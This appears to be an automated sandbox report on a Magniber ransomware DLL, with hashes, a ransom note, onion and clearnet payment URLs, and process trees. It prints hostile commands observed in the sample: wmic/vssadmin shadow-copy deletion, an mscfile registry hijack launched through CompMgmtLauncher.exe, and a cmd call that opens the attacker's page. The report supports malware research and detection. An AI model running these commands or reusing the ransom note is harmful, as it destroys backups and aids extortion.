magniber | 0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d

Analysis

max time kernel
118s
max time network
143s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11-12-2024 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll
Size

20KB
MD5

e22903f461b4ba138bf4cfaee0062c9a
SHA1

23f785def95f9fd88e7204d276adc0a11715807d
SHA256

0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d
SHA512

f218ad91ac09f084ff2fa0dd2ab621b0b47e986962f410a13b84d8b017c21c31d129f85a067d77465f6c860899a7f56eb9d7a78608ca79156fd506b4fe146c5b
SSDEEP

384:Ja2iKL1YmLf0r4ZNxBz8E/NOibLm/V4pP/IQd2BQLE6AKFd19t/aSccuo:J3HLpf0EZOoOibLQH06QLE6ASjt/d

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://14c430d846009c5066qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec http://14c430d846009c5066qbvpseec.ourunit.xyz/qbvpseec http://14c430d846009c5066qbvpseec.topsaid.site/qbvpseec http://14c430d846009c5066qbvpseec.iecard.top/qbvpseec Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://14c430d846009c5066qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec

http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec

http://14c430d846009c5066qbvpseec.ourunit.xyz/qbvpseec

http://14c430d846009c5066qbvpseec.topsaid.site/qbvpseec

http://14c430d846009c5066qbvpseec.iecard.top/qbvpseec

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral1/memory/2116-4-0x0000000001DD0000-0x0000000002402000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	1752	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2856	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3064	1752	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	540	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	1752	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2216	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1372	1752	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	1752	vssadmin.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	1752	cmd.exe	40
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1752	vssadmin.exe	40

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Drops desktop.ini file(s) 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\09OB1FV8\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SK4ZQZYF\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WMBPAEF9\desktop.ini	DllHost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y07CWM3B\desktop.ini	DllHost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2116 set thread context of 1116	2116	rundll32.exe	19
PID 2116 set thread context of 1172	2116	rundll32.exe	20
PID 2116 set thread context of 1236	2116	rundll32.exe	21
PID 2116 set thread context of 2040	2116	rundll32.exe	23

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 10 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2868	vssadmin.exe
2856	vssadmin.exe
1704	vssadmin.exe
1872	vssadmin.exe
2764	vssadmin.exe
540	vssadmin.exe
1476	vssadmin.exe
2216	vssadmin.exe
228	vssadmin.exe
1608	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0EF56ED1-B868-11EF-809B-F2DF7204BD4F} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001a0e42ee85f0884dbf8d17461b2df110000000000200000000001066000000010000200000005beb3fea0b67ce1238f5b053d2abd0a52a54e4e979fd1b6bd49b19947701e92d000000000e8000000002000020000000191dd114b789b1619a64dfdbcc784c9fec17db046b25e0fd347040cfcec29b812000000024f4460af3a4ebf817a31752ec32f466b8d66731503975a3db552e9df9ff8c504000000062f7df10c64e8e96e25e398b56d10479d565fa5883fa029bdfddc9b2e91c47a27a5b7220781266890e09e0a8ed588015ad7a8f75e422785e9cad49f89a8c1657	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "440156121"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 107619e5744cdb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001a0e42ee85f0884dbf8d17461b2df11000000000020000000000106600000001000020000000bb1e68a35f9e5ad3ebe12fa65875e3b73d1b45723db12fd2c7d02e882ce4d4e9000000000e800000000200002000000094e72d60a9a4126bafc51ab4006ad8bc16e99e12224260e6ac9b7c9da084fa13900000009e0314a567692c871c9b3f0ad26abbe893712fa86d7a4f8f9f04ffaed2994451aa931ff5ec7302c0c0a710f91dcfb21fc7d79b34b18b4a5f215baaf5ab54b41a404d6376012cbea959287416d14cade81e2cdea613c2381267768dbd2c4ab5de77f40c0b87c7019f581d3d8c5cfe1b5787a2e6484518b668bd6841ec6a8a3c2d599a31acd7cf3744c9c61b38fcc2e82c40000000a64ac924788632e3490f68b43148e48b7d9baf9cdfb5e7c7ef27c2833735c87b6b83159a26f77c5b487e6bbf94d4bd3cb42901e188cad778249904f8f79e0a82	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1748	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2116	rundll32.exe
2116	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2116	rundll32.exe
2116	rundll32.exe
2116	rundll32.exe
2116	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1236	Explorer.EXE
Token: SeShutdownPrivilege	1236	Explorer.EXE
Token: SeShutdownPrivilege	1236	Explorer.EXE
Token: SeShutdownPrivilege	1236	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2560	WMIC.exe
Token: SeSecurityPrivilege	2560	WMIC.exe
Token: SeTakeOwnershipPrivilege	2560	WMIC.exe
Token: SeLoadDriverPrivilege	2560	WMIC.exe
Token: SeSystemProfilePrivilege	2560	WMIC.exe
Token: SeSystemtimePrivilege	2560	WMIC.exe
Token: SeProfSingleProcessPrivilege	2560	WMIC.exe
Token: SeIncBasePriorityPrivilege	2560	WMIC.exe
Token: SeCreatePagefilePrivilege	2560	WMIC.exe
Token: SeBackupPrivilege	2560	WMIC.exe
Token: SeRestorePrivilege	2560	WMIC.exe
Token: SeShutdownPrivilege	2560	WMIC.exe
Token: SeDebugPrivilege	2560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2560	WMIC.exe
Token: SeRemoteShutdownPrivilege	2560	WMIC.exe
Token: SeUndockPrivilege	2560	WMIC.exe
Token: SeManageVolumePrivilege	2560	WMIC.exe
Token: 33	2560	WMIC.exe
Token: 34	2560	WMIC.exe
Token: 35	2560	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2200	wmic.exe
Token: SeSecurityPrivilege	2200	wmic.exe
Token: SeTakeOwnershipPrivilege	2200	wmic.exe
Token: SeLoadDriverPrivilege	2200	wmic.exe
Token: SeSystemProfilePrivilege	2200	wmic.exe
Token: SeSystemtimePrivilege	2200	wmic.exe
Token: SeProfSingleProcessPrivilege	2200	wmic.exe
Token: SeIncBasePriorityPrivilege	2200	wmic.exe
Token: SeCreatePagefilePrivilege	2200	wmic.exe
Token: SeBackupPrivilege	2200	wmic.exe
Token: SeRestorePrivilege	2200	wmic.exe
Token: SeShutdownPrivilege	2200	wmic.exe
Token: SeDebugPrivilege	2200	wmic.exe
Token: SeSystemEnvironmentPrivilege	2200	wmic.exe
Token: SeRemoteShutdownPrivilege	2200	wmic.exe
Token: SeUndockPrivilege	2200	wmic.exe
Token: SeManageVolumePrivilege	2200	wmic.exe
Token: 33	2200	wmic.exe
Token: 34	2200	wmic.exe
Token: 35	2200	wmic.exe
Token: SeIncreaseQuotaPrivilege	2200	wmic.exe
Token: SeSecurityPrivilege	2200	wmic.exe
Token: SeTakeOwnershipPrivilege	2200	wmic.exe
Token: SeLoadDriverPrivilege	2200	wmic.exe
Token: SeSystemProfilePrivilege	2200	wmic.exe
Token: SeSystemtimePrivilege	2200	wmic.exe
Token: SeProfSingleProcessPrivilege	2200	wmic.exe
Token: SeIncBasePriorityPrivilege	2200	wmic.exe
Token: SeCreatePagefilePrivilege	2200	wmic.exe
Token: SeBackupPrivilege	2200	wmic.exe
Token: SeRestorePrivilege	2200	wmic.exe
Token: SeShutdownPrivilege	2200	wmic.exe
Token: SeDebugPrivilege	2200	wmic.exe
Token: SeSystemEnvironmentPrivilege	2200	wmic.exe
Token: SeRemoteShutdownPrivilege	2200	wmic.exe
Token: SeUndockPrivilege	2200	wmic.exe
Token: SeManageVolumePrivilege	2200	wmic.exe
Token: 33	2200	wmic.exe
Token: 34	2200	wmic.exe
Token: 35	2200	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2356	iexplore.exe
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2356	iexplore.exe
2356	iexplore.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1236	Explorer.EXE
1236	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 1748	1116	taskhost.exe	31
PID 1116 wrote to memory of 1748	1116	taskhost.exe	31
PID 1116 wrote to memory of 1748	1116	taskhost.exe	31
PID 1116 wrote to memory of 2032	1116	taskhost.exe	32
PID 1116 wrote to memory of 2032	1116	taskhost.exe	32
PID 1116 wrote to memory of 2032	1116	taskhost.exe	32
PID 1116 wrote to memory of 2200	1116	taskhost.exe	33
PID 1116 wrote to memory of 2200	1116	taskhost.exe	33
PID 1116 wrote to memory of 2200	1116	taskhost.exe	33
PID 1116 wrote to memory of 1676	1116	taskhost.exe	34
PID 1116 wrote to memory of 1676	1116	taskhost.exe	34
PID 1116 wrote to memory of 1676	1116	taskhost.exe	34
PID 1676 wrote to memory of 2560	1676	cmd.exe	38
PID 1676 wrote to memory of 2560	1676	cmd.exe	38
PID 1676 wrote to memory of 2560	1676	cmd.exe	38
PID 2032 wrote to memory of 2356	2032	cmd.exe	39
PID 2032 wrote to memory of 2356	2032	cmd.exe	39
PID 2032 wrote to memory of 2356	2032	cmd.exe	39
PID 2356 wrote to memory of 2484	2356	iexplore.exe	41
PID 2356 wrote to memory of 2484	2356	iexplore.exe	41
PID 2356 wrote to memory of 2484	2356	iexplore.exe	41
PID 2356 wrote to memory of 2484	2356	iexplore.exe	41
PID 1488 wrote to memory of 2752	1488	cmd.exe	46
PID 1488 wrote to memory of 2752	1488	cmd.exe	46
PID 1488 wrote to memory of 2752	1488	cmd.exe	46
PID 2752 wrote to memory of 2900	2752	CompMgmtLauncher.exe	49
PID 2752 wrote to memory of 2900	2752	CompMgmtLauncher.exe	49
PID 2752 wrote to memory of 2900	2752	CompMgmtLauncher.exe	49
PID 2040 wrote to memory of 2872	2040	DllHost.exe	54
PID 2040 wrote to memory of 2872	2040	DllHost.exe	54
PID 2040 wrote to memory of 2872	2040	DllHost.exe	54
PID 2040 wrote to memory of 2476	2040	DllHost.exe	55
PID 2040 wrote to memory of 2476	2040	DllHost.exe	55
PID 2040 wrote to memory of 2476	2040	DllHost.exe	55
PID 2476 wrote to memory of 3012	2476	cmd.exe	58
PID 2476 wrote to memory of 3012	2476	cmd.exe	58
PID 2476 wrote to memory of 3012	2476	cmd.exe	58
PID 3064 wrote to memory of 2132	3064	cmd.exe	63
PID 3064 wrote to memory of 2132	3064	cmd.exe	63
PID 3064 wrote to memory of 2132	3064	cmd.exe	63
PID 2132 wrote to memory of 1872	2132	CompMgmtLauncher.exe	64
PID 2132 wrote to memory of 1872	2132	CompMgmtLauncher.exe	64
PID 2132 wrote to memory of 1872	2132	CompMgmtLauncher.exe	64
PID 1236 wrote to memory of 540	1236	Explorer.EXE	68
PID 1236 wrote to memory of 540	1236	Explorer.EXE	68
PID 1236 wrote to memory of 540	1236	Explorer.EXE	68
PID 1236 wrote to memory of 2740	1236	Explorer.EXE	69
PID 1236 wrote to memory of 2740	1236	Explorer.EXE	69
PID 1236 wrote to memory of 2740	1236	Explorer.EXE	69
PID 2740 wrote to memory of 2212	2740	cmd.exe	72
PID 2740 wrote to memory of 2212	2740	cmd.exe	72
PID 2740 wrote to memory of 2212	2740	cmd.exe	72
PID 1660 wrote to memory of 1032	1660	cmd.exe	77
PID 1660 wrote to memory of 1032	1660	cmd.exe	77
PID 1660 wrote to memory of 1032	1660	cmd.exe	77
PID 1032 wrote to memory of 2504	1032	CompMgmtLauncher.exe	78
PID 1032 wrote to memory of 2504	1032	CompMgmtLauncher.exe	78
PID 1032 wrote to memory of 2504	1032	CompMgmtLauncher.exe	78
PID 1172 wrote to memory of 344	1172	Dwm.exe	82
PID 1172 wrote to memory of 344	1172	Dwm.exe	82
PID 1172 wrote to memory of 344	1172	Dwm.exe	82
PID 1172 wrote to memory of 1784	1172	Dwm.exe	83
PID 1172 wrote to memory of 1784	1172	Dwm.exe	83
PID 1172 wrote to memory of 1784	1172	Dwm.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1748
- C:\Windows\system32\cmd.exe
  cmd /c "start http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec^&2^&41210360^&72^&351^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec&2&41210360&72&351&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2356 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:2484
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2560

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:344
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:1784
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1952

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1236
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2116
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2860
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    PID:1792
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:860
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:540
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2212

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:3012

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2900

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2868

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:584

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2856

